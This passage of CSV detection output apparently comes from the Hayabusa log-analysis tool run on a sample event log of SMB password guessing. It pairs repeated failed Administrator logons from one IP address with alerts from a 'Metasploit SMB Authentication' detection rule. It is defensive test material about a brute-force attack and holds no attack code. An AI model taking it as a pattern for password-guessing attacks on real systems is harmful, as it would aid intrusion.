NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
